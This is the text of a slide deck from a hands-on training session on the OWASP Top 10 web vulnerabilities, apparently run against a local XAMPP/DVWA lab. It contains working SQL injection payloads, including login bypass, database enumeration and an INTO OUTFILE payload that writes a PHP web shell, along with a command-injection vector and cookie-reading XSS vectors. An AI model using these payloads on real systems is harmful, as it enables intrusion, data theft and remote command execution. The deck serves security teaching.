Top 10 Web Application Security Hazards

by Abhinav Sejpal

Null - Humla Session

Thought Works - Bangalore


  • This presentation is intended for educational purpose only and I cannot be held liable for any kind of damages done, whatsoever to your machine, or any other damages. 
  • Don't try this attack on any other system without having context knowledge or permission, this may harm someone directly or indirectly.
  • Feel free to use this presentation for practice or education purpose.

^ I hope - You gotcha ^

~ We aren't going to do this ~

So, feel free to stop when you have a doubt!

 Are you Ready to Rock ???


  •  Why Web Application Security Testing ?
  •  Myths, you'll hear - but Do you believe ?
  •  What is OWASP, what do they provide ? 
  •  OWASP Web Top - 10 Publication
  •  How web works ?
  •  Proof of Concept  for Top - 10 attack 
  •  Self exploratory exercise on Top - 10
  •  Learn + Hack   
  •  Q  &  A

  for Social Media

Twitter handle 

 @ @Abhinav_Sejpal

Hashtag for this session

     #Nullhumla #nullblr


Means 'attack' in Hindi




Objectives for this session

  • Build Security Awareness for web application
  • Get to know attack method of hackers
  • Learn way to discover Security vulnerabilities
  • Learn basic of secure web application via OWASP Top 10

Why Web Application Security Testing?

Here is the Answer !

  • Increases vulnerability to attacks
  • Damage to your reputation and brand value
  • Loss of customer confidence & potential business
  • Disturbance to your online means of revenue collection
  • Legal liability
  • Website downtime, loss of time & resources in mitigating the damage
  • Additional costs and regression testing associated with securing web applications for future attacks
  • And much more! Boom - Isn't it?

The average loss reported in the 2007 CSI Computer Crime and Security Survey was $350,424.

Compromised Scenario

Myths, you'll hear - but Do you believe?

Don't believe in myths!

  • Secure Socket Layer (SSL / HTTPS) protects my website.
  • Buy this one tool and it will solve all my problems.
  • We don’t have anything worth to be stolen.
  • {Java - Insert Name here} is a secured language.
  • We can't possibly be a target.
  • We never had any data breaches on our organization and we are safe. Our technical team is much smart. #facepalm
  • We have a firewall setup (WAF) - Nothing to worry! You wish 
  • You're safer on a mobile site as compared to a desktop.
  • Can come up with umpteen more!

So, Do you all agree  that

Web Application Security is essential?


My Opinion  

Security Testing is always a race between hackers and the security companies to get one step ahead of each other.

 Risk management 

The Web will never be 100 per cent secure, but with good due diligence, it can be one of the safest places on earth to do business. 

After all, our primary concern is seamless business.

There we stand ^ Web application Security Ninja's ^

What is OWASP?

People !


OWASP -The Open Web Application Security Project

  • (OWASP) is a 501c3 not for-profit worldwide charitable organization
  • Everyone is free to participate in OWASP and all the materials are available under a free and open software license
  • It provides a free access to community resources and events:

  •  Publications, Articles 
  • Standard Testing and Training Software
  •  Local Chapters & Mailings List
  •  World-wide conferences 


Make application security visible, so that people and organizations can make informed decisions about true application security risk!

What do we mean by OWASP  Top 10 Web Application Security Vulnerabilities ?

  • A list of the 10 most severe security issues frequently occur in web applications.
  • It’s a list of vulnerabilities that require immediate remediation.
  • Existing code should be checked for these vulnerabilities, as these flaws are effectively targeted by attackers.
  • New updates on tithe year (third year sequence).
  • Strong push to present as a standard

This is nothing but

  Top ten web application security hazards

recommended by OWASP Survey.

^ Myth Involved Here^

Are we sure that this survey results are trustworthy ?

This wiki is not a standard or a policy. It provides a brief description of the vulnerabilities, and methods of prevention.

Let's Begin our Journey


Top 10 Web Application Security Hazards

 I don't want to showcase top ten - let's start with baby steps 

How Web works ?

HTTP Header Flow

 Tamper Google HTTP request!

I have questions?

  • Does the user input go through any validation at user’s web browser?
  • Does Business Logic verify the user inputs at server side?


If your answer is 'No', then be ready for the 'Nightmare'


Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way. 

 ~ Courtesy   ~

I AM that bad input

'Injection ' 

Could be Command / SQL statement 


What is SQL ?

SQL stands for Structured Query Language.

  • Execute queries against a database
  • Retrieve data from a database
  • Insert new records in a database
  • Delete records from a database
  • In short, All DB operations :)

 User Input? aha

What if this works? Umm

It's me - SQL Injection

  • People call me SQLi also

  • 'Yes' - I am a bottleneck for Developers since many years

  • Smart Geeks opt for me along with user inputs &  perform attack.

Previous Attacks via SQLi

  •  SQL injection has been responsible for 83% of all
    successful hacking-related data
    breaches, from 2005-2011.


  • Automation Infects 100,000s: In 2008,
    SQLi attacks became automated via the
    use of botnets. Mass website infection
    incidents include 500,000 reported in
    2008; 210,000 in 2009; 500,000 in 2010 and 380,000 in 2011.

SQLi facts

  • Dominant Source of Attack: 97 percent
    of data breaches worldwide are due to
    SQL injection.
    (Source: National Fraud Authority UK)

  • Web Application Risk: SQL Injection was the leading Web application risk of 2011. It ranks as one
    of the most common software vulnerabilities in survey after survey(Source: Trustwave)


SQLi is old days' problem - I shouldn't worry about this.


I am using Java / PHP / RUBY / ASP modern days' framework.

Struts 2
GWT (Google Web toolkit)

Latest SQL Injection Campaign Infects 1 Million Web Pages

Yahoo Hit By SQL Injection Attack

SQL injection flaw in Wall Street Journal database led to breach

SQL injection isn't going any where  <3

Setup the Test Lab

Install XAMPP

Acronym for:

Targeted Application

Client Side language : HTML & Javascript
Server side Language: PHP

Why PHP ?  - Any answer Here?

Why MySQL?  MySQL is  Girlfriend of PHP <3 

PHP is used by 82.2% of all the websites as server-side programming language.

PHP: 244M sites

2.1M IP addresses

2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo

Error Based SQLi



Basic SQL query Login page :-

SELECT * FROM users where username="username" AND password = "pass"

Basic PHP statement for Login page :-

SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"  

*Md5() method is used to encrypt the password.

       * Demo at SQL *

Cheat sheet

#Attack  - 1

SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'

Injection code :-

admin' or '1'='1

Why ?

Attack 1 is rely on 'User name'

SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'

Can't perform this attack on password field due to encryption.

User name = anything' or '1' ='1

password = anything' or '1'='1

* known User name is mandatory Here*

Learning from the attack 1

User name is known i.e. 'admin'

  •  Append SQL statement with user name
  • <It simply works>

    But you can't perform this attack without user name

    Comments based SQLi

    # : Single line comment

    "-- " : Sequence to end of line comment

    /*  Sequence to following block comment*/


    Basic SQL query Login page :-

    SELECT * FROM users where username="username" AND password = "pass"

    What if  - I insert comments in first attack

    SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"

    << AND password = "pass" >> doesn't execute all

    if you get me - attack doesn't require user name now

     SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"

    SQL statement will be always true due  '1' = '1'  thus doesn't matter, you are knowing user name or not.

    Yes - I am done. but what if '#' is not valid input?

    (-- ) works for you buddy!

    * --(space) is syntax 

    admin' or '1' = '1' --:False 

    admin' or '1' = '1' --  : True

    Mostly people forget to add space, so I use below vector

    admin' or '1' = '1' -- space + any one character

    E.G. > admin' or '1' = '1' -- Sandy

    So, What do you think,

    SQL is all about  1=1

    ssshhh - Do you hear that? - NO

    Dump Sensitive DB info

    * Identify column gets selected.

    * Identify the data set which value will be displayed.

    a%' union select 1,2,3,4,5 from users #

    a%' union select 1,@@datadir,2,3,4 from users #

    a%' union select 1,@@version,3,4,5 from users #

    Database Enumeration  

    a%' union select 1,table_schema,2,3,4 from information_schema.tables  #

    Table Enumeration

    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  #

    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  where table_schema='sqlhumla'#

    Shell Injection

     - Text File Writing

    Into outfile 

    I want to save a MySQL query result to a text file like this:

    SELECT * FROM orders INTO OUTFILE '/data.txt'

    Can we append the same logic with our injection?

    user=frodo' into outfile 'test.txt'; -- comments

    Shell Injection

    'Hello world' PHP File Writing at current folder

    =frodo' into outfile "../../htdocs/xampp/sqli/test.txt"; - a

    Select * from users where username = 'frodo' union select 1,2,3,"<?php  echo "Hello World"; ?> ",5 from users into outfile '../../htdocs/xampp/sqli/shellTest.php';  -- a

    PHP Shell code

    <?php $output = shell_exec('Test'); echo '<pre>$output</pre>'; ?>

    Append the same as SQL injection

    user=frodo' union select 1,2,3, "<?php $output = shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from users into outfile '../../htdocs/xampp/sqli/shell.php';  -- a

    There you are!


    Play ground

    Damn Vulnerable Web App

    Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment.

    Command Injection && dir

    OWASP #A1

    Understand the Code

    Another vector

    1 | dir c:\

    Bad Code with Substitutions


    Tools / Framework for POC

    • Metasploit
    • SQL MAP
    • Havij
    • Sql inject Me(add-on)
    • Burp suit 
    • SQL Inject  or many....!


    Cross-site scripting

    Wikipedia says "XSS enables attackers to inject client-side script into web pages viewed by other users".

    OWASP #A3

    What is XSS ?

    OWASP says "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites.

    So where does XSS stand?

    According to white hat, 53% web applications have XSS vulnerability.

    Do you know,

    81 out of 100 popular Mobile websites are vulnerable to XSS?

    Stats from Google's Vulnerability Reward Program

    Input - Output Context

    Life cycle of Reflected XSS

    And I'm your XSS!

    </script> <script> confirm(1); </script>

       If you get me, it is Reflected XSS

    LIVE"><script> alert(document.cookie); </script>

    Challenge #1

    Copyright © 2014, IBM Corporation

    Reflected XSS (AKA Non-Persistent)

    Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data.

    Can we save JS code in DB?

    What if so ? :D


    Life cycle of Stored XSS

     It is Stored XSS


    Vector :  Under BIO :- </p></script> <img src=1 onerror=alert(document.cookie);>

    Stored XSS

    Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application.

    #XSS write-up by Ashar

    Oh no, there is an XSS in your JS<img src=nonexistent onerror=alert(1)>

    It's DOM based XSS

    Directory Object Model

    Understand the Logic

    When Source gets synced? 


    An attacker may append a JS to the affected page URL which would, when executed, display the alert box.

    Impact would show only on - Client side JS

     If you want to know more about DOM based XSS then  please bug ""

    More Info at :

    No more talk about Self XSS

    <shhh - Very low priority but should be acknowledged >

    But there is a lot to learn :D

    Am I Vulnerable To 'Broken Authentication  &

    Session Management'?

    A2 - OWASP TOP 10

    So, Let's Learn about Web App DB structure

    Passwords are stored in plain text.

    oh really  -- ':(

    OWASP #A6

    Password is protected, when stored using encryption algorithm.  Are you sure?

    You may also try out hash but password salt is a recommended solution so far.

    Password Policy should be applied nicely and should not be weaker.
    -- * --
    Security & Business logic should be applied for changing password. Change password doesn't ask for Current password - LOL 

    In-secured Session-ID

    Cookies Flag HTTP ONLY 
    Secure flag would be complimentary 

    Take Away 

    Avoiding Insecure Direct Object References

    OWASP #A4  

     URLS' Pattern

    Demo  #1

    Tamper the ID parameter

    Enumeration using parameter

    LIVE -- N

    Missing Function Level Access Control

    OWASP #A7




    Using Known Vulnerable Components 

    OWASP #A9

    ~ Protection against ~

    A6 – Sensitive Data Exposure

    Basic Understanding

    OWASP #A8 – Avoiding CSRF Flaws



    Understand CSRF Fix

    Security Misconfiguration

    OWASP -#A5 

               if you are planning to host your own server 
    this talk matters for you 

    "Securing a Linux Web Server in 10 Steps"

    by Akash Mahajan

    Yes - I'm Done!

    Feel free to write me at bug.wrangler at

    Good Reads

    -- Explore Google Darling > Search  'OWASP  TOP Ten' --

    We need you!

    • Attend Null Meets-up & give presentations.
    • Share your ideas & leanings.
    • Talk to our community champions & gain from leanings.
    • Your feedback helps us to build a good community.
    • Looking forward to your ongoing support.

    Say 'Hello' @null0x00


    - Twitter Folks -
    @riyazwalikar , @anantshri , @makash
    @TroyHunt , @yog3sharma , @

     #Nullblr Leads & Champions

    Big thank you to @ ,@  & you All.

    Thank you! 

    Keep the security ante up.

    License and Copyrights 

    Copyrights 2013-2014 Abhinav Sejpal


     (CC BY-NC-ND 3.0)

    Attribution-NonCommercial-NoDerivs 3.0 Unported

     Dedicated to my lovely daddy

    Top 10 Web Application Security Hazards

    By Abhinav Sejpal

    Top 10 Web Application Security Hazards

    Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.

    • 6,073